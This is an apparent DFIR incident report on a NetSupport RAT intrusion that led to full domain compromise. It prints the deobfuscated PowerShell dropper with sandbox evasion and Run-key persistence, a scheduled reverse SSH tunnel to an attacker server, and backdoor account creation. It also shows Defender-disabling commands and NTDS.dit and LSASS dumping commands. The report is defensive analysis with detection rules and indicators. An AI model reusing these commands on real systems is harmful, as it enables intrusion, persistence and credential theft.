NetSupport Intrusion Results in Domain Compromise

NetSupport Manager is one of the oldest third-party remote access tools still currently on the market with over 33 years of history. This is the first time we will report on a NetSupport RAT intrusion, but malicious use of this tool dates back to at least 2016. During this report, we will analyze a case from January 2023 where a NetSupport RAT was utilized to infiltrate a network. The RAT was then used for persistence and command & control, resulting in a full domain compromise.

Case Summary

This intrusion began with an email delivered with a zip file containing a malicious Javascript file. Following email delivery, a user extracted and executed the Javascript file. The JavaScript code pulled down an obfuscated PowerShell script that was run in memory. The PowerShell script was responsible for deploying NetSupport onto the system along with ensuring the script was not running in a sandbox and establishing persistence using registry run keys.

Five days after the deployment of NetSupport, the threat actor conducted preliminary reconnaissance by using various Windows utilities like whoami, net, and systeminfo. The threat actor then tried to re-enable a domain admin account that was disabled but appeared to have not succeeded.

This activity was followed several hours later by the installation of an OpenSSH server on the beachhead to facilitate persistence to the machine and network. In order to connect to the OpenSSH server the threat actors established a reverse SSH tunnel from the beachhead to their own server hosted on a VPS provider. 

Using the previously mentioned reverse SSH tunnel to proxy connections through the beachhead host, the threat actors created a connection to the domain controller. Through the SSH tunnel the threat actors made use of Impackets to issue various discovery commands looking for privileged groups and domain joined computers.

Eight hours later, the threat actor changed firewall settings on a remote server and then began using Impackets to engage in further lateral movement. The threat actor moved cab files to the remote hosts using SMB and then expanded and ran them using commands. The executed files were also NetSupport malware, however, these were configured to talk to a new command and control server. Once running, the threat actor then setup a scheduled task for persistence on these remote hosts. A few additional discovery commands were then issued on remote hosts before activity ceased.

The threat actors returned the next day deploying NetSupport on a domain controller. With this access they proceeded to dump the NTDS.dit database. After dumping it, they used 7-zip to compress the files. No specific exfiltration was observed but we assess with medium confidence that this archive was exfiltrated over the network via one of the existing command and control channels.

A little less than an hour later, the threat actor moved to another domain controller and proceeded to again dump NTDS.dit. They also dropped and ran Pingcastle, an active directory auditing tool. While this was running, they used NetSupport to access a backup server to create a new account and add it to the local Administrators and Remote Desktop groups. Using that account, they logged in using RDP, proxying the connection from the beachhead host.

After logging in, they dropped Netscan and a keygen. The threat actor checked on the status of Microsoft Defender and then proceeded to disable it. After disabling the protections, they dropped a renamed ProcDump binary and proceeded to dump LSASS on the domain controller, as well as a backup server.

After this, the threat actor then issued a PowerShell command to search and dump Windows event ID 4624 logon events from the host. These were then zipped using 7-zip and then likely exfiltrated over existing command and control channels for further review. The threat actor also browsed file shares from the domain controller, opening several sensitive documents. Netscan was then moved to the domain controller and executed there. The threat actor issued a few more discovery commands using WMI, and then performed some clean up by killing running tasks like Netscan and the ssh proxy.

The final actions observed involved the threat actor dropping two Nim binaries on a domain controller. These Nim binaries were then used to attempt to create a backdoor user and elevate them to admin level permissions. We did not observe any backdoor account created after execution. After our own testing, we saw the tool failed to work and would return an error. After this, no further hands on activity was seen from the threat actor before they were evicted from the network.


We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, Havoc, etc. More information on this service can be found here.

Our All Intel service includes private reports, exploit events, long term infrastructure tracking, clustering, C2 configs, and other curated intel, including non-public case data.

If you are interested in hearing more about our services or would like to talk about a free trial, please reach out using the Contact Us page. We look forward to hearing from you.

Interested in a DFIR Report sticker, shirt, mug or other merchandise? Check out our shop.


Analysis and reporting completed by @iiamaleks, @MittenSec, @Miixxedup

Initial Access

Initial Access began with a ZIP file delivered to a victim through email. This email campaign was observed in the wild occurring between late December 2022 through mid January 2023 according to Brad/@malware_traffic (Thanks Brad!). An earlier sample was documented here using a USPS delivery theme with some overlap in command and control present between the intrusions. Once the ZIP file is extracted the user is presented with a JavaScript file.

Once the user clicks on the JavaScript file, WScript will invoke the script.


NetSupport Deployment

WScript was used to execute 2326.js after the user ran the file from the zipped archive.

Following initial execution, 2326.js invokes an encoded PowerShell command that reaches out to a hard-coded domain, hxxp://, downloading and invoking the contents as PowerShell code.


The contents downloaded from hxxp:// take the form of an obfuscated PowerShell script responsible for the initial deployment of NetSupport. The full obfuscated contents of this script can be found on this link.

The following is the deobfuscated NetSupport deployment script. Note, this script has been cleaned up for brevity.

# Get Script Filename
${ScriptPath} = Split-Path -parent ${MyInvocation}.MyCommand.Definition

# Check Script Filename Agianst a Blacklist
if (${ScriptPath} -match "avast") {exit}
if (${ScriptPath} -match "avg")      {exit}
if (${ScriptPath} -match "sample")   {exit}
if (${ScriptPath} -match "analysis") {exit}
if (${ScriptPath} -match "malware")  {exit}
if (${ScriptPath} -match "sandbox")  {exit}
if (${ScriptPath} -match "virus")    {exit}

# Wrapper Function around Convert-StringToBinary
function React (${Source}, ${Destination})
    Convert-StringToBinary -InputString ${Source} -FilePath ${Destination};

# Write a Base64 Encoded String to Disk
function Convert-StringToBinary (${InputString}, ${FilePath})
    ${file}= ${InputString}

    ${Data} =  [System.Convert]::FromBase64String(${file})
    ${MemoryStream} = New-Object "System.IO.MemoryStream"
    ${MemoryStream}.Write(${Data}, 0, ${Data}."Length")
    ${MemoryStream}.Seek(0,0) | Out-Null

    ${DecompressedStream} = New-Object System.IO.Compression.GZipStream(${MemoryStream}, [System.IO.Compression.CompressionMode]::Decompress)
    ${StreamReader} = New-Object System.IO.StreamReader(${DecompressedStream})
    ${t} = ${StreamReader}.ReadToEnd()

    ${ByteArray} =  [System.Convert]::FromBase64String(${t});
    [System.IO.File]::WriteAllBytes(${FilePath}, ${ByteArray});

# The Install Function is invoked at the end of the script and will have the main execution logic.
function Install
    # Registry Path Variables for Persistence, these are written to towards the end of the script.
    [string] ${reg_key} = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
    [string] ${reg_name} = "SoftwareUpdater"

    # Embedded File Variables
    ${File1} = Gzip Compressed and Base64 Encoded presentationhost.exe
    ${File2} = Gzip Compressed and Base64 Encoded client32.ini # NetSupport client configuration
    ${File3} = Gzip Compressed and Base64 Encoded HTCTL32.DLL # Dependency DLL
    ${File4} = Gzip Compressed and Base64 Encoded msvcr100.dll # Dependency DLL
    ${File5} = Gzip Compressed and Base64 Encoded nskbfltr.inf # NetSupport component file
    ${File6} = Gzip Compressed and Base64 Encoded NSM.ini # NetSupport component file which tells the installer which components to install
    ${File7} = Gzip Compressed and Base64 Encoded NSM.lic # NetSupport license information file
    ${File8} = Gzip Compressed and Base64 Encoded pcicapi.dll # Dependency DLL
    ${File9} = Gzip Compressed and Base64 Encoded PCICHEK.DLL # Dependency DLL
    ${File10} = Gzip Compressed and Base64 Encoded PCICL32.DLL # Dependency DLL
    ${File11} = Gzip Compressed and Base64 Encoded remcmdstub.exe
    ${File12} = Gzip Compressed and Base64 Encoded TCCTL32.DLL # Dependency DLL

    # Generate Random Folder Name with 8 alphanumeric characters
    ${RandF}=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | &('%') {[char]${_}}) )
    ${FPath} ="$env:appdata\$Randf"
    mkdir ${FPath}

    [string] ${ClientName} = "presentationhost.exe"
    [string] ${remcmdstub} = "remcmdstub.exe"

    React -source ${File1} -destination "$FPath\"+"$ClientName"
    React -source ${File2} -destination "$fpath\client32.ini"
    React -source ${File3} -destination "$fpath\HTCTL32.DLL"
    React -source ${File4} -destination "$fpath\msvcr100.dll"
    React -source ${File5} -destination "$fpath\nskbfltr.inf"
    React -source ${File6} -destination "$fpath\NSM.ini"
    React -source ${File7} -destination "$fpath\NSM.lic"
    React -source ${File8} -destination "$fpath\pcicapi.dll"
    React -source ${File9} -destination "$fpath\PCICHEK.DLL"
    React -source ${File10} -destination "$fpath\PCICL32.DLL"
    React -source ${File11} -destination "$fpath\$remcmdstub"
    React -source ${File12} -destination "$fpath\TCCTL32.DLL"

    # Establish Persistance in Run Key
    New-ItemProperty -Path "$reg_key" -Name "$reg_name" -Value "$fpath\$clientname"  -PropertyType "String"

    # Start NetSupport
    Start-Process "$fpath\$clientname"

    # Remove Files
    ${F}= Get-Content "$env:temp\insghha4.txt"
    Remove-Item $env:TEMP\*.ps1
    Remove-Item ${F}

## Begin Execution Here By Invoking the Install Function ##

The NetSupport deployment script takes the following steps:

  1. Check the execution name of the script against a list of filenames, if any match the script will exit.
    • The names checked include avast, avg, sample, analysis, malware, sandbox, and virus.
  2. All the required files for the NetSupport deployment are packaged inside the deployment script. All these files will be extracted into a randomly named folder under the users %APPDATA% directory.
    • The randomly named folder will be a combination of 8 randomly generated letters and numbers, such as %APPDATA\8EDX3iOx or %APPDATA%\KcEwrg3X .
  3. The NetSupport executable will be added to the Registry Run Key for persistence.
  4. The NetSupport executable will then be invoked to begin execution.

The NetSupport script creates all required files in the %APPDATA% folder.

In addition, an entry was added to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run for presentationhost.exe (NetSupport) to facilitate persistence on the machine.

Lastly, the PowerShell script will finish by invoking the NetSupport executable directly.

Batch Script Automation

The threat actor was observed making use of Batch scripts to automate some of their tasks, such as executing discovery programs, dumping credentials, and establishing persistence.


During the beginning stages of the intrusion, the NetSupport deployment script was used to establish persistence using the Run key under the user registry hive. For more details, see the Execution section.

Since the deployment script was PowerShell based, the source process of the registry activity will appear as powershell.exe.

In addition, a scheduled task was created to launch OpenSSH SSH Server with a specific configuration altered to make OpenSSH listen locally on port 2222 instead of 22.

schtasks.exe /create /sc minute /mo 1 /tn "SSH Server" /rl highest /tr "C:\ProgramData\sshd\sshd.exe -f C:\ProgramData\sshd\config\sshd_config"

Following the previous command, another scheduled task was created to establish a reverse SSH tunnel to the attacker’s server. See the lateral movement section to understand how this aided the attacker’s activities.

schtasks.exe /create /sc minute /mo 1 /tn "SSH Key Exchange" /rl highest /tr "C:\ProgramData\sshd\ssh.exe -i C:\ProgramData\sshd\config\keys\id_rsa -N -R 369: [email protected] -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15"

The entire process related to OpenSSH and its persistence was automated by the threat actors through a script named install.bat. In this case, the script generated a new private key using ssh-keygen and corrected the permissions on the file using icacls; this is required because if the permissions are too open on the private key, SSH will exit with an error. More details regarding the SSH tunneling command executed within the scheduled task can be seen under the Command and Control section.

The threat actor created a local user account and added the user to the Administrators and Remote Desktop Users groups. The newly created user account was named WDAGUtilityAccount2 to blend in with the default user account WDAGUtilityAccount present on Windows.

net  user WDAGUtilityAccount2 Decryptme1488@ /add
net  localgroup Administrators WDAGUtilityAccount2 /add
net  localgroup "Remote Desktop Users" WDAGUtilityAccount2 /add

Lastly, the threat actor made use of NIM based tools to authenticate via pass-the-hash and to create a new local administrator user.

The following demonstrates the possible command line parameters of this tool.

Looking at the strings present in the files we can discover that these are compiled NIM binaries.

Sifting further through the strings, we stumble on the command used to create the user account.

@%COMSPEC% /C "net user localend Decryptme7 /add"

We can also see the command that was used to attempt to add the user to the administrators group.

We did not observe any backdoor account created after execution. When we performed our own testing, we saw the tools failed to work and would return an error rather than create an account.

Defense Evasion

During this intrusion, the threat actor was primarily concerned with evading detection by Microsoft Defender. This can be seen multiple times throughout the intrusion where the threat actor checked the historical alerts from Defender using powershell Get-MpThreat after conducting credential harvesting or lateral movement actions.

During the intrusion, we observed multiple attempts to add exclusions and ultimately trying to disable the local Defender using below commands. The threat actor made several typos during the command execution, indicating a hands-on approach rather than a scripted one. 

powershell  Get-MpThreat
powershell  Get-MpPreference
powershell  Add-MpPreference -ExclustionPath c:\users\public
powershell  Add-MpPreference -ExclusionPath c:\users\public
powershell  Add-MpPreference -ExclusionProcess c:\users\public\mpms.exe
powershell  Add-MpPreference -DisableBehaviourMonitoring True
powershell  Add-MpPreference -DisableBehaviorMonitoring True
powershell  Add-MpPreference -DisDisableRealtimeMonitoring True

The mpms executable from the above commands was a renamed ProcDump binary. It was likely renamed in an attempt to avoid detection.

After some activity, the threat actor entered the ‘Scans’ directory of Microsoft’s Defender software, located under:

C:\ProgramData\Microsoft\Windows Defender\Scans\History\

In addition to checking the Windows Defender historical scan files, the threat actor once again used the Get-MpThreat Cmdlet to query the history of threats detected by Windows Defender.

During the intrusion, the threat actor relied heavily on the toolkit Impacket (especially and wmiexec). To facilitate some of its capabilities, the host-based firewall was modified before the actual execution of and wmiexec executions:

cmd.exe /C netsh advfirewall firewall add rule dir=in name="DCOM" program=C:\Windows\system32\svchost.exe service=rpcss action=allow protocol=TCP localport=135 > C:\Windows\Temp\VlPWyecW.tmp 2>&1
cmd.exe /C netsh advfirewall firewall add rule dir=in name="DCOM" program=C:\Windows\system32\svchost.exe service=rpcss action=allow protocol=TCP localport=135 > C:\Windows\Temp\pOrnerOW.tmp 2>&1
cmd.exe /C netsh advfirewall firewall add rule dir=in name ="WMI" program=C:\Windows\system32\svchost.exe service=winmgmt action = allow protocol=TCP localport=any > C:\Windows\Temp\XsssmLZZ.tmp 2>&1
cmd.exe /C netsh advfirewall firewall add rule dir=in name ="UnsecApp" program=C:\Windows\system32\wbem\unsecapp.exe action=allow > C:\Windows\Temp\HaALurWi.tmp 2>&1
cmd.exe /C netsh advfirewall firewall add rule dir=out name ="WMI_OUT" program=C:\Windows\system32\svchost.exe service=winmgmt action=allow protocol=TCP localport=any > C:\Windows\Temp\WkiMfXXo.tmp 2>&1

Multiple times during the intrusion, the threat actor made use of cabinet files (.cab). These are archive files, which support lossless data compression. They are mainly used to distribute device drivers and system files. However, in this case, the actor used its functionality similarly to a traditional .zip archive and deployed its contents under the programdata directory.

cmd.exe /Q /c expand -F:* c:\programdata

After decompression, we found a NetSupport executable disguised as a Windows component. The executable file was named mswow86.exe. The threat actor created a scheduled task to run the binary on every logon.

cmd.exe /Q /c start "" %%programdata%%\schcache\mswow86.exe
cmd.exe /Q /c schtasks.exe /create /sc onlogon /tn "Wow64 Subsystem" /rl highest /tr "%%programdata%%\schcache\mswow86.exe

All the chosen names appear to represent a ‘legitimate’ Windows component:

  • The name for the executable (mswow86.exe)
  • The storage location of this executable (%programdata%\schache\)
  • The scheduled task name (Wow64 Subsystem)

Credential Access

We observed the threat actor dumping the ntds.dit database on two different domain controllers using a batch script, which then executed the command described in here:

powershell.exe  "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public\ntds' q q"
powershell.exe  "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\ProgramData\ntdsutil' q q" 

As seen in the Defense Evasion section, the actor used the Sysinternals tool ProcDump. The threat actor executed a command to identify the PID of the lsass.exe process. This allowed them to target the correct process to dump lsass:

It appears this will not work, as there is no directory for the find command, but the actor likely piped it together, as we saw execution of tasklist at the same time:

This is likely the result of executing something like the following (tasklist | find /i "lsas" ):

Using the renamed ProcDump utility, the threat actor dumps the lsass.exe process, which can be used to get more credential information:

mpms.exe  -accepteula -ma 632
mpms.exe  -accepteula -ma 716


The attackers executed several familiar discovery commands on the targeted systems. These were related to the discovery of information on users, hosts and the network configuration. The threat actor connected via the NetSupport agent and then started running commands via a spawned instance of cmd.exe

Below are the first batch of executed discovery commands observed. As seen during this entire intrusion, the threat actor makes small mistakes, either with typos or in command functionality:

net user
net user /domain
whoami /all
net user <PRIV_ACCOUNT>
net group "Domain Admins" /domain
cmdkey /list

We observed the threat actor quickly query for a specific account. This account is a local admin and a domain admin. However, this account was not activated and the actor tried to enable it, making a few mistakes along the way:

nltest /dclist:<REDACTED>
cmdkey /add:<DC_NAME> /user:<DOMAIN>\<PRIV_ACC> /pass:REDACTED 
net user <PRIV_ACC> /domain
net user <USER_ACCOUNT> /domain
cmdkey /del:<DC_NAME>
cmdkey /add:"<DC_NAME>" /user:<DC_NAME>\<PRIV_ACC> /pass:REDACTED
cmdkey /del:"<DC_NAME>"
net user <PRIV_ACCOUNT>
cmdkey /add:"<DC_NAME>" /user:<DC_NAME>\<PRIV_ACC> /pass:REDACTED 
net user /add:"<BEACHHOST>" /user:<DOMAIN_NAME><PRIV_ACC>/pass:REDACTED
cmdkey /list
cmdkey /del:"<DC_NAME>"
cmdkey /del:"<BEACHHOST>" 

We observe a couple of mistakes, as a result of hands-on activity and struggling to get things working:

  • The first cmdkey is actually correct usage, however the account was not activated.
  • Using /add requires the usage of domain credentials, not credentials of machine.
  • Adding quotes to a command, where it does not matter.

After this endeavor, the threat actor tried elsewhere, looking around for interesting information related to the SYSVOL shares. Additionally, the actor looked for the presence of SSH. This was not installed on the system, so the threat actor installed their own SSH server, as can be seen under the PERSISTENCE section. Additionally, the threat actor tried his luck to find additional domain controllers:

net view \\<DOMAIN_NAME>.local
net view \\<DOMAIN_NAME>.local\sysvol
net view \\<DOMAIN_NAME>.local\SYSVOL
whoami /all
find /i "ssh" 
ping -n 1 <DOMAIN_NAME>.local
ping -n 1 <DC1>.<DOMAIN_NAME>.local
ping -n 1 <DC2>.<DOMAIN_NAME>.local
ping -n 1 <DC3>.<DOMAIN_NAME>.local
arp -a
ping -n 1 REDACTED
ping -n 1 -a REDACTED
ping -n 1 -a REDACTED
ping -n 1 -a REDACTED
net view REDACTED

In addition to the recognizable characteristics, this excellent read explains how to hunt for in the Windows event logs:

cmd.exe /C net group /domain > C:\Windows\Temp\aWatKmSa.tmp 2>&1

Resulted in:

and three seconds later in:

After this, wmiexec is observed:

cmd.exe /Q /c cmdkey /list 1> \\\ADMIN$\__REDACTED 2>&1
cmd.exe /Q /c dor 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c whoami 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c cd \ 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c cd 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c whoami 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c cd \ 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c cd 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c cd programdata 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c cd 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c ls 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c dir 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c expand -F:* c:\programdata 1> \\\ADMIN$\____REDACTED  2>&1
cmd.exe /Q /c whoami /all 1> \\\ADMIN$\____REDACTED  2>&1

After the Impacket activity, the threat actor returned later to a domain controller and a backup server, where additional tooling was used for discovery. The first was PingCastle, an active directory auditing tool. On the domain controller, the threat actor executed the following commands:

net  group "Domain Admins"
➝ starting "pingcastle.exe --healthcheck --level Full"
  ➝ script to dump the ntds

The second one was the SoftPerfect Network Scanner. This utility is commonly used by threat actors. While a paid utility, many use the free trial version. However, during this intrusion, the actor clearly did not pay for its version, as they brought their own keygen. On the backup server, the threat actor executed the following commands:

 "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Public\netscan_portable\" -spe -an -ai#7zMap24244:76:7zEvent17814


During the later stage of the intrusion, the threat actor dumped the event 4624 logs from a domain controller. These were written to the file mf.txt. This file was later added to a zip archive. The file was not looked at on the host it was dumped on. The dumping of these logs may have been to review user logon activity across the environment. 

powershell  -w hidden -C "Get-WinEvent -Logname 'security' -FilterXPath '*[System[EventID=4624]]' -MaxEvents 1 | sort-object timeCreated | select-object -ExpandProperty message"
powershell  -w hidden -C "Get-WinEvent -Logname 'security' -FilterXPath '*[System[EventID=4624]]' | sort-object timeCreated | select-object -ExpandProperty message"

Lateral Movement

The threat actor heavily used the reverse SSH tunnel discussed within the Command and Control section to assist in lateral movement. Through this tunnel, the threat actor was able to proxy their access from the beachhead to other assets in the network using a handful of different techniques, including WMI, and RDP.

As mentioned in the discovery section, Impacket’s atexec module was utilized within the SSH tunnel to proxy traffic to a domain controller to assist with lateral movement. In between executions of atexec, we see Windows Security event logs that match behavior of lateral movement:


During the intrusion, the threat actor used SMB to copy files over to other systems. Here, the files were not sent over the network in the clear, preventing network inspection, but we were able to inspect the file creation and deletion via event ID 5145 for File Share Auditing event. In the logs, we can see the AccessMask of 0x2 during the file write followed by 0x10080 during the file delete action.


Impacket’s wmiexec tool was used to pivot across the environment, extract the archived file, and execute scheduled tasks to run NetSupport RAT on remote systems.

For a breakdown of the process command line arguments, refer to this previous report.


Remote Desktop Protocol (RDP) was used from the beachhead to two servers and two domain controllers on the network. We can verify this activity with Windows Event ID 4624 with logon type 10. This log triggers whenever a user successfully logs on to a computer or server via remote interactive logon (RDP or other remote desktop services).

Below illustrates the threat actor initiating RDP sessions from the beachhead to various servers within the network on day eight of this intrusion.


Below, illustrates the full network architecture and lateral movement seen within this incident.

During the intrusion, the threat actor revealed two different host names leaked in various Windows Event logs during their RDP sessions.


Example Windows event ID 4776:

Example Windows event ID 4624:

Example Windows event ID 4779:


The threat actor was observed connecting to a file server from the Domain Controller and browsing multiple secretive documents on the system.

Additionally, we see the threat actor using 7-zip to collect the previously dumped ntds and a text file called mf.txt.

Command and Control


As referenced in the Initial Access section, the NetSupport deployment script writes a client32.ini file to the AppData Roaming path, which specifies the primary and secondary gateway.

The primary gateway, npinmclaugh11[.]com:2145, was unsuccessful as it resolved to an IP of As a result, all communication was thus routed through the secondary gateway at npinmclaugh14[.]com:2145

Dns query:
RuleName: -
UtcTime: <DAY 1> 03:34:16.236
ProcessGuid: {a9d5a793-0bb7-63ca-9404-000000000300}
ProcessId: 7648
QueryStatus: 0
Image: C:\Users\<REDACTED>\AppData\Roaming\eHNjqgzZ\presentationhost.exe
Dns query:
RuleName: -
UtcTime: <DAY 1> 03:34:18.828
ProcessGuid: {a9d5a793-0bb7-63ca-9404-000000000300}
ProcessId: 7648
QueryStatus: 0
Image: C:\Users\<REDACTED>\AppData\Roaming\eHNjqgzZ\presentationhost.exe

NetSupport connections were established on day one to on port 2145; however, on day five of the intrusion, another NetSupport client32.ini file was deployed to other assets on the network, introducing a new command and control server of wsus-isv-local[.]tech:133 and wsus-isv-internal[.]tech:133.

Dns query:
RuleName: -
UtcTime: <DAY 4> 22:26:27.990
ProcessGuid: {1dc91c81-5b19-63d0-0806-000000000600}
ProcessId: 4852
QueryStatus: 0
Image: C:\ProgramData\schcache\mswow86.exe
User: <REDACTED>\Administrator

The following table provides a summary of all the domains and IPs used by NetSupport during this incident :

NetSupport C2 Domain DNS Resolve Status Resolved IP
npinmclaugh11[.]com NOERROR
npinmclaugh14[.]com NOERROR
wsus-isv-local[.]tech NOERROR
wsus-isv-internal[.]tech NXDOMAIN N/A

SSH Tunnelling

On day five of this intrusion, two scheduled tasks (“SSH Server” and “SSH Key Exchange”) were created on the beachhead to establish a local SSH server running on port 2222 for remote system

The command used to establish the reverse SSH tunnel within the scheduled task is described below:


Below diagram depicts this SSH reverse tunnel from the victim network to attacker’s VPS.


During the intrusion, we noticed that the threat actors staging data of interest.  It is likely that the threat actor exfiltrated the data over the encrypted C2 channel; however, we observed no evidence of this activity.  The ntds.dit can be used to dump hashes from the Active Directory, which can then be cracked using a tool like Hashcat. The file mf.txt contained all dumped events with event id 4624. This could be analyzed offline to determine possible interesting accounts without actively querying the Active Directory. No specific exfiltration actions were observed, so anything taken was likely moved over existing command and control channels. The threat actor also appeared to be interested in some documents, but we only observed opening of those files, not any exfiltration attempts.


The threat actors were evicted from the network before any further impact occurred.










ecb98b7b4d4427eb8221381154ff4cb2  PingCastle.exe
















ET INFO NetSupport Remote Admin Checkin
ET INFO NetSupport Remote Admin Response
ET MALWARE NetSupport RAT with System Information
ET POLICY NetSupport GeoLocation Lookup Request
ET USER_AGENTS WinRM User Agent Detected - Possible Lateral Movement
ET POLICY WinRM wsman Access - Possible Lateral Movement
ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection


 Search sigma rules at

Sigma Repo:

0afbd410-de03-4078-8491-f132303cb67d - Renamed NetSupport RAT Execution
2afafd61-6aae-4df4-baed-139fa1f4c345 - Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
8bc64091-6875-4881-aaf9-7bd25b5dda08 - Suspicious Process Patterns NTDS.DIT Exfil
0b8baa3f-575c-46ee-8715-d6f28cc7d33c - NTDS.DIT Created
9f107a84-532c-41af-b005-8d12a607639f - Suspicious Cabinet File Expansion
058f4380-962d-40a5-afce-50207d36d7e2 - HackTool - CrackMapExec Execution Patterns
0ef56343-059e-4cb6-adc1-4c3c967c5e46 - Suspicious Execution of Systeminfo
4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67 - Renamed ProcDump Execution
17769c90-230e-488b-a463-e05c08e9d48f - Powershell Defender Exclusion
1ec65a5f-9473-4f12-97da-622044d6df21 - Powershell Defender Disable Scan Feature
ad720b90-25ad-43ff-9b5e-5c841facc8e5 - Add User to Local Administrators Group
ffa28e60-bdb1-46e0-9f82-05f7a61cc06e - Suspicious Add User to Remote Desktop Users Group
1e33157c-53b1-41ad-bbcc-780b80b58288 - WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c - New Firewall Rule Added Via Netsh.EXE
ca2092a1-c273-4878-9b4b-0d60115bf5ea - Suspicious Encoded PowerShell Command Line
07f8bdc2-c9b3-472a-9817-5a670b872f53 - Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 - New Generic Credentials Added Via Cmdkey.EXE
502b42de-4306-40b4-9596-6f590c81f073 - Local Accounts Discovery

Joe Security:

200105 - Powershell drops NetSupport RAT client

The DFIR Report Repo:

a5661068-c85f-4ee1-bc13-6b753bd2c7b7 - Adding, Listing and Removing Credentials via Cmdkey CommandLine Ultility
d938de18-7f57-4c9c-93b9-a621c746d594 - NIM Pass The Hash Tooling Detection



Diamond Model



Proxy - T1090
Uncommonly Used Port - T1065
JavaScript - T1059.007
Windows Command Shell - T1059.003
PowerShell - T1059.001
Registry Run Keys / Startup Folder - T1547.001
Scheduled Task - T1053.005
Local Account - T1136.001
Disable or Modify Tools - T1562.001
NTDS - T1003.003
LSASS Memory - T1003.001
Protocol Tunneling - T1572
Windows Management Instrumentation - T1047
Remote Desktop Protocol - T1021.001
System Owner/User Discovery - T1033
Domain Groups - T1069.002
Remote System Discovery - T1018
System Information Discovery - T1082
Process Discovery - T1057
Domain Account - T1087.002
Local Account - T1087.001
Archive via Utility - T1560.001
Obfuscated Files or Information - T1027
Deobfuscate/Decode Files or Information - T1140
Masquerade Task or Service - T1036.004
SMB/Windows Admin Shares - T1021.002
Lateral Tool Transfer - T1570
Malicious File - T1204.002
Domain Trust Discovery - T1482
Group Policy Discovery - T1615 

Internal case #19438